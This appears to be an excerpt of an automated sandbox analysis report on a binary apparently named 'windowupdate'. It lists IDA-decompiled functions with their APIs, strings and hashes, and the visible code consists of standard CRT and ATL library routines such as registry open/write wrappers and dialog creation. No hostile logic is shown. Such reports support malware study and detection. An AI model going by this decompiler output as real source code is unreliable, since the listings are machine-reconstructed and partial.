                      • %ls, xrefs: 00D99134
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___crt_unique_heap_ptr__wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                      • API String ID: 4232693209-3092436121
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00D97D80(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char* _a12, intOrPtr _a16, signed char _a20) {
                      				signed int _v8;
                      				char* _v12;
                      				char* _v16;
                      				char* _v20;
                      				char* _v24;
                      				char* _v28;
                      				char* _v32;
                      				char* _v36;
                      				char* _v40;
                      				char* _v44;
                      				char* _v48;
                      				char* _v52;
                      				char* _v56;
                      				char* _v60;
                      				char* _v64;
                      				char* _v68;
                      				char* _v72;
                      				void* _v73;
                      				signed char _v74;
                      				void* _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				char _v92;
                      				signed int _t59;
                      				void* _t72;
                      				void* _t77;
                      				void* _t98;
                      				void* _t99;
                      				signed int _t100;
                      
                      				_t99 = __esi;
                      				_t98 = __edi;
                      				_t91 = __edx;
                      				_t77 = __ebx;
                      				_t59 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t59 ^ _t100;
                      				if(_a16 >= (_a8 & 0x000000ff) + 4) {
                      					if((_a8 & 0x000000ff) != 0) {
                      						 *_a12 = 0x2d;
                      						_a12 = _a12 + 1;
                      						 *_a12 = 0;
                      						_a16 = _a16 - 1;
                      					}
                      					_v72 = "INF";
                      					_v68 = "INF";
                      					_v64 = "inf";
                      					_v60 = "inf";
                      					_v56 = "NAN";
                      					_v52 = "NAN";
                      					_v48 = "nan";
                      					_v44 = "nan";
                      					_v40 = "NAN(SNAN)";
                      					_v36 = "NAN";
                      					_v32 = "nan(snan)";
                      					_v28 = "nan";
                      					_v24 = "NAN(IND)";
                      					_v20 = "NAN";
                      					_v16 = "nan(ind)";
                      					_v12 = "nan";
                      					_v84 = _a4 - 1;
                      					if((_a20 & 0x000000ff) == 0) {
                      						_v80 = 2;
                      					} else {
                      						_v80 = 0;
                      					}
                      					_v88 = _v80;
                      					if(_a16 <= E00D82E00( *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + _v88 * 4)))) {
                      						_v73 = 0;
                      					} else {
                      						_v73 = 1;
                      					}
                      					_v74 = _v73;
                      					if((_v74 & 0x000000ff) != 0) {
                      						_v92 = 0;
                      					} else {
                      						_v92 = 1;
                      					}
                      					_t91 = _a16;
                      					E00D84A20(E00D82DE0(_a12, _a16,  *((intOrPtr*)(_t100 + (_v84 << 4) - 0x44 + (_v88 + _v92) * 4))), _t70, L"strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])", L"fp_format_nan_or_infinity", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x58, 0);
                      					_t72 = 0;
                      				} else {
                      					 *_a12 = 0;
                      					_t72 = 0xc;
                      				}
                      				return E00D47280(_t72, _t77, _v8 ^ _t100, _t91, _t98, _t99);
                      			}

                      APIs
                      Strings
                      • fp_format_nan_or_infinity, xrefs: 00D97EBA
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00D97EB5
                      • strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 00D97EBF
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error_strlen
                      • String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                      • API String ID: 2470549621-3631232711
                      • Opcode ID: 627704a97486e7128d0022704640af9eb4de749c5e4263a018b77cc975c56ec4
                      • Instruction ID: 974c9982af9e229a58238a41d54aa6e070302bff4a2014824c544ef5f207845e
                      • Opcode Fuzzy Hash: 627704a97486e7128d0022704640af9eb4de749c5e4263a018b77cc975c56ec4
                      • Instruction Fuzzy Hash: 194139B09042899BCF14DFA8D8557EEBFB1BF05308F584059E8116B381D7B69909CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D55350(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				char _v44;
                      				char _v60;
                      				char* _t34;
                      				signed char _t37;
                      				char* _t38;
                      				intOrPtr _t44;
                      				intOrPtr* _t46;
                      				char* _t53;
                      				char* _t73;
                      				intOrPtr _t74;
                      				char* _t78;
                      				char _t84;
                      
                      				_t34 =  *0xf20640; // 0x0
                      				if( *_t34 != 0) {
                      					_t78 =  *0xf20640; // 0x0
                      					__eflags =  *_t78 - 0x30;
                      					if( *_t78 < 0x30) {
                      						L5:
                      						E00D59C90( &_v60);
                      						_t37 = E00D4FA10( &_v60);
                      						__eflags = _t37 & 0x000000ff;
                      						if((_t37 & 0x000000ff) == 0) {
                      							L10:
                      							_t38 =  *0xf20640; // 0x0
                      							__eflags =  *_t38;
                      							if( *_t38 != 0) {
                      								_v8 = E00D4F350( &_v44, 2);
                      							} else {
                      								_v8 = E00D4F350( &_v36, 1);
                      							}
                      							_v12 = _v8;
                      							E00D4F240(_a4, _v12);
                      							return _a4;
                      						}
                      						_t44 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t44 + 1;
                      						_t46 = E00D4FA30( &_v60);
                      						_v20 =  *_t46;
                      						_v16 =  *((intOrPtr*)(_t46 + 4));
                      						__eflags = _a8 - 0x42;
                      						if(__eflags != 0) {
                      							__eflags = _a8 - 0x41;
                      							if(__eflags != 0) {
                      								goto L10;
                      							}
                      							_push(_v16);
                      							E00D4EED0(_v20, __eflags, _a4, _v20);
                      							return _a4;
                      						}
                      						_push(_v16);
                      						E00D4EF60(_v20, __eflags, _a4, _v20);
                      						return _a4;
                      					}
                      					_t73 =  *0xf20640; // 0x0
                      					_t84 =  *_t73;
                      					__eflags = _t84 - 0x39;
                      					if(_t84 > 0x39) {
                      						goto L5;
                      					}
                      					_t53 =  *0xf20640; // 0x0
                      					asm("cdq");
                      					_v28 =  *_t53 - 0x2f;
                      					_v24 = _t84;
                      					_t74 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t74 + 1;
                      					E00D4F510(__ebx, _a4, __edi, __esi, _v28, _v24);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D55367
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 00D553BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A
                      • API String ID: 3739413223-3554254475
                      • Opcode ID: 3b80280f030cbf19f0c361f2702c51170e0437bd42074c922000bd7cdfa12582
                      • Instruction ID: 03f2c58ef281517d8422bddf3a80b7f7156a37895acdb5134e09d37f9b605508
                      • Opcode Fuzzy Hash: 3b80280f030cbf19f0c361f2702c51170e0437bd42074c922000bd7cdfa12582
                      • Instruction Fuzzy Hash: 5D413071900518EFDF14DF94E8A19AE7BB5FF84302F148059FD0A9B266DB30AA45DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E00D345F0(void* __ecx, void* __esi, void* _a4, char* _a8, int _a12) {
                      				void* _v8;
                      				void* _v12;
                      				void* _v16;
                      				void* _v20;
                      				void* _v24;
                      				void* _v28;
                      				void* _t37;
                      				long _t39;
                      				void* _t44;
                      				void* _t48;
                      				void* _t64;
                      				void* _t69;
                      				void* _t70;
                      
                      				_t68 = __esi;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t72 = _a4;
                      					if(_a4 == 0) {
                      						_t37 = L00D84930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16fb, 0, "%ls", L"hKeyParent != 0");
                      						_t70 = _t70 + 0x18;
                      						if(_t37 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v16 = 0;
                      				if( *((intOrPtr*)(_v8 + 8)) == 0) {
                      					_t68 = _t70;
                      					_t64 = _a4;
                      					_t39 = RegOpenKeyExA(_t64, _a8, 0, _a12,  &_v16);
                      					__eflags = _t70 - _t70;
                      					_v28 = E00DC1520(_t39, _t70 - _t70);
                      				} else {
                      					_t64 = _a8;
                      					_v28 = E00D330F0( *((intOrPtr*)(_v8 + 8)), _t68, _a4, _t64, 0, _a12,  &_v16);
                      				}
                      				_v24 = _v28;
                      				if(_v24 == 0) {
                      					_v24 = E00D34420(_v8, _t68);
                      					_t77 = _v24;
                      					if(_v24 != 0) {
                      						_t48 = L00D84930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1703, 0, "%ls", L"lRes == 0L");
                      						_t70 = _t70 + 0x18;
                      						if(_t48 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					 *_v8 = _v16;
                      					_t64 = _v8;
                      					 *(_t64 + 4) = _a12 & 0x00000300;
                      				}
                      				_push(_t64);
                      				_push(_v24);
                      				E00DC14C0(_t69, 0xd34718);
                      				_pop(_t44);
                      				return E00DC1520(_t44, _t69 - _t70 + 0x18);
                      			}

                      APIs
                      • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,00D3AED1,00000000,?), ref: 00D34687
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D346FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckOpenStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0$lRes == 0L
                      • API String ID: 2727503844-1643637747
                      • Opcode ID: ace5eccaf8163be01836a6967a7076f1784fef2a1fd0c34dd5f231ad85623d9b
                      • Instruction ID: 3325758f5375222320e36c00973665940304081d374d5997cc2f2d36e15785f2
                      • Opcode Fuzzy Hash: ace5eccaf8163be01836a6967a7076f1784fef2a1fd0c34dd5f231ad85623d9b
                      • Instruction Fuzzy Hash: 06315075E00209EFCB14EF98D952FEEB7B4EB49700F148159E505A7281E674AE40CBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E00D3C1E0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				char _v24;
                      				intOrPtr* _v32;
                      				intOrPtr _v36;
                      				char _v44;
                      				intOrPtr* _t35;
                      				void* _t42;
                      				intOrPtr _t46;
                      				void* _t48;
                      				void* _t50;
                      				intOrPtr _t67;
                      				void* _t74;
                      				void* _t75;
                      				void* _t77;
                      				void* _t78;
                      				void* _t79;
                      				void* _t80;
                      
                      				_t67 = __edx;
                      				_t74 =  &_v44;
                      				memset(_t74, 0xcccccccc, 0xa << 2);
                      				_t79 = _t78 + 0xc;
                      				_t75 = _t74 + 0xa;
                      				if(_a4 != 0) {
                      					_v8 = 0;
                      					_push(0xdc8724);
                      					_t35 = E00D479A0(0xc);
                      					_t80 = _t79 + 8;
                      					_v32 = _t35;
                      					_v12 = _v32;
                      					__eflags = _v12;
                      					if(_v12 != 0) {
                      						 *_v12 = _a8;
                      						 *((intOrPtr*)(_v12 + 4)) = _a12;
                      						E00D41D00(__ebx,  &_v24, _t75, __esi, _a4 + 0xc, 0);
                      						_v8 = E00D41D90( &_v24, __esi);
                      						__eflags = _v8;
                      						if(__eflags < 0) {
                      							_t67 = _v12;
                      							_v36 = _t67;
                      							E00D482A0(_v36);
                      							_t42 = E00D3F210(0xf23704);
                      							E00D323E0(__ebx, _t75, __esi, __eflags, E00D323B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fc), _t42, 0, "ERROR : Unable to lock critical section in AtlModuleAddTermFunc\n", 0xc);
                      							_t80 = _t80 + 0x18;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t50 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fd, 0, "%ls", 0xde40dc);
                      								_t80 = _t80 + 0x18;
                      								__eflags = _t50 - 1;
                      								if(_t50 == 1) {
                      									asm("int3");
                      								}
                      							}
                      						} else {
                      							_t67 =  *((intOrPtr*)(_a4 + 8));
                      							 *((intOrPtr*)(_v12 + 8)) = _t67;
                      							 *((intOrPtr*)(_a4 + 8)) = _v12;
                      						}
                      						E00D41D60( &_v24);
                      					} else {
                      						_v8 = 0x8007000e;
                      					}
                      					_t46 = _v8;
                      				} else {
                      					_t46 = 0x80070057;
                      				}
                      				_push(_t67);
                      				E00DC14C0(_t77, 0xd3c31c);
                      				_t48 = _t46;
                      				return E00DC1520(_t48, _t77 - _t80 + 0x28);
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3C301
                      Strings
                      • %ls, xrefs: 00D3C2CB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C2D7
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C2AC
                      • ERROR : Unable to lock critical section in AtlModuleAddTermFunc, xrefs: 00D3C295
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlModuleAddTermFunc
                      • API String ID: 930174750-2929966712
                      • Opcode ID: 2e6dac4fbc10d5f0a883ff2c5b691c7e75db0fcd76affe3ab48e8179c4b09083
                      • Instruction ID: 646c28a6dbe7294d663d8274e9b7d1329b1466e2db679f306640d75a5276bfb8
                      • Opcode Fuzzy Hash: 2e6dac4fbc10d5f0a883ff2c5b691c7e75db0fcd76affe3ab48e8179c4b09083
                      • Instruction Fuzzy Hash: C8319078E40309EFDB04EF94D842FAEB7B4EB44714F148069E805BB382D6719A44CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E00D34960(void** __ecx, void* __esi, char* _a4, char* _a8) {
                      				void** _v8;
                      				char* _v12;
                      				int _v16;
                      				void** _v20;
                      				int _v24;
                      				int _v28;
                      				void* _t36;
                      				long _t41;
                      				void* _t42;
                      				void* _t44;
                      				void* _t45;
                      				void* _t58;
                      				void* _t59;
                      
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t61 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t45 = L00D84930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1886, 0, "%ls", L"m_hKey != 0");
                      						_t59 = _t59 + 0x18;
                      						if(_t45 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				L5:
                      				L5:
                      				if(_a8 == 0) {
                      					_v28 = 0;
                      				} else {
                      					_v28 = 1;
                      				}
                      				_v24 = _v28;
                      				_t65 = _v24;
                      				if(_v24 == 0) {
                      					_t44 = L00D84930(_t65, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1887, 0, "%ls", L"__atl_condVal");
                      					_t59 = _t59 + 0x18;
                      					if(_t44 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v24 != 0) {
                      					goto L13;
                      				}
                      				_t42 = 0xd;
                      				L17:
                      				return E00DC1520(_t42, _t58 - _t59 + 0x18);
                      				L13:
                      				__eflags = 0;
                      				if(0 != 0) {
                      					goto L5;
                      				}
                      				_v16 = 0;
                      				_v12 = _a8;
                      				do {
                      					_t36 = E00D82E00(_v12);
                      					_t59 = _t59 + 4;
                      					_v20 = _t36 + 1;
                      					_v12 = _v12 + _v20;
                      					_v16 = _v16 + _v20;
                      					__eflags = _v20 - 1;
                      				} while (_v20 != 1);
                      				_t41 = RegSetValueExA( *_v8, _a4, 0, 7, _a8, _v16);
                      				__eflags = _t59 - _t59;
                      				_t42 = E00DC1520(_t41, __eflags);
                      				goto L17;
                      			}

                      APIs
                      • _strlen.LIBCMT ref: 00D34A1D
                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000007,00000000,00000000), ref: 00D34A5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-3821136969
                      • Opcode ID: 58f8df984a92671c2626bf8741e1cb4a73201fd59d770c834f448a1ea96e1c6c
                      • Instruction ID: 74b07e7dc7705e40fc90a00bf68223b973844af6f61a097779b6d10ee62f3f47
                      • Opcode Fuzzy Hash: 58f8df984a92671c2626bf8741e1cb4a73201fd59d770c834f448a1ea96e1c6c
                      • Instruction Fuzzy Hash: 60314D75E40219AFDB10EF99C842BAEB7B4EF54704F248159E514B7281E7B4AB40CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 57%
                      			E00D3DD40(void* __ebx, intOrPtr __ecx, void* __esi, struct HWND__* _a4, long _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _t21;
                      				struct HWND__* _t27;
                      				intOrPtr _t30;
                      				void* _t32;
                      				void* _t34;
                      				void* _t35;
                      				void* _t51;
                      				void* _t52;
                      
                      				_t35 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t21 = _v8;
                      					_t54 =  *((intOrPtr*)(_t21 + 4));
                      					if( *((intOrPtr*)(_t21 + 4)) != 0) {
                      						_t34 = L00D84930(_t54, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfbd, 0, "%ls", L"this->m_hWnd == 0");
                      						_t52 = _t52 + 0x18;
                      						if(_t34 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v12 = E00D3C490(_v8 + 8, 0, 0, 0);
                      				if(_v12 != 0) {
                      					E00D33B00(_t35, 0xf23710, __eflags, _v8 + 8, _v8);
                      					 *((char*)(_v8 + 0x20)) = 0;
                      					_t27 = CreateDialogParamA(E00D32B30(0xf20220), 0xca, _a4, E00D42030, _a8);
                      					__eflags = _t52 - _t52;
                      					_v16 = E00DC1520(_t27, _t52 - _t52);
                      					do {
                      						__eflags =  *((intOrPtr*)(_v8 + 4)) - _v16;
                      						if(__eflags != 0) {
                      							_t32 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfcf, 0, "%ls", L"this->m_hWnd == hWnd");
                      							_t52 = _t52 + 0x18;
                      							__eflags = _t32 - 1;
                      							if(_t32 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = 0;
                      					} while (0 != 0);
                      					_t30 = _v16;
                      					L13:
                      					return E00DC1520(_t30, _t51 - _t52 + 0xc);
                      				}
                      				SetLastError(0xe);
                      				E00DC1520(_t22, _t52 - _t52);
                      				_t30 = 0;
                      				goto L13;
                      			}

                      APIs
                      • SetLastError.KERNEL32(0000000E), ref: 00D3DDAE
                      • CreateDialogParamA.USER32(00000000,000000CA,00000000,00D42030,CCCCCCCC), ref: 00D3DDFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CreateDialogErrorLastParam
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$this->m_hWnd == 0$this->m_hWnd == hWnd
                      • API String ID: 3445605341-3995377508
                      • Opcode ID: dcd8075b10d7eb933240ee2f5b40a27194826b9a217c787b6efd6104463a598e
                      • Instruction ID: a1b63ecb4f9c1d0f1abbc67d0e506d2c7d92642cd554651402e6ab272675460c
                      • Opcode Fuzzy Hash: dcd8075b10d7eb933240ee2f5b40a27194826b9a217c787b6efd6104463a598e
                      • Instruction Fuzzy Hash: F4217E71E40319BFDB10EB98E947F6EB776EB50700F1485A4F505BB282D6B09E408BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00D4BCF0(intOrPtr* _a4, intOrPtr* _a8) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t30;
                      				intOrPtr _t31;
                      				signed char _t38;
                      				intOrPtr _t59;
                      				void* _t67;
                      
                      				if( *_a8 != 0) {
                      					L2:
                      					_t30 = L00D84930(_t72, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_exception.cpp", 0x12, 0, "%ls", L"to->_What == nullptr && to->_DoFree == false");
                      					_t67 = _t67 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(( *(_a4 + 4) & 0x000000ff) == 0 ||  *_a4 == 0) {
                      						_t31 =  *_a4;
                      						 *_a8 = _t31;
                      						 *((char*)(_a8 + 4)) = 0;
                      						return _t31;
                      					} else {
                      						_v12 = E00D82E00( *_a4) + 1;
                      						E00D4BBF0( &_v8, E00D85F00(_v12));
                      						_t38 = E00D4BC30( &_v8);
                      						__eflags = _t38 & 0x000000ff;
                      						if((_t38 & 0x000000ff) != 0) {
                      							_v16 =  *_a4;
                      							_v20 = E00D4BC80( &_v8);
                      							E00D82DE0(_v20, _v12, _v16);
                      							 *_a8 = E00D4BC50( &_v8);
                      							 *((char*)(_a8 + 4)) = 1;
                      							return E00D4BC10( &_v8);
                      						}
                      						return E00D4BC10( &_v8);
                      					}
                      				}
                      				_t59 = _a8;
                      				_t72 =  *(_t59 + 4) & 0x000000ff;
                      				if(( *(_t59 + 4) & 0x000000ff) == 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      • _strlen.LIBCMT ref: 00D4BD5B
                      • __aligned_msize.LIBCMTD ref: 00D4BDB6
                      • __crt_unique_heap_ptr.LIBCMTD ref: 00D4BDC1
                        • Part of subcall function 00D4BC10: __crt_unique_heap_ptr.LIBCMTD ref: 00D4BC1A
                      Strings
                      • to->_What == nullptr && to->_DoFree == false, xrefs: 00D4BD09
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00D4BD17
                      • %ls, xrefs: 00D4BD0E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                      • API String ID: 3817959681-3374554652
                      • Opcode ID: 380ebe3a89da70d78dac604bbb2e92308782a52e2bae83041ce3af96d0a1da34
                      • Instruction ID: 47a88f9997fef201fac5c1fbb5eccb4f19fdb8eff0456b802a50c3402415cb1b
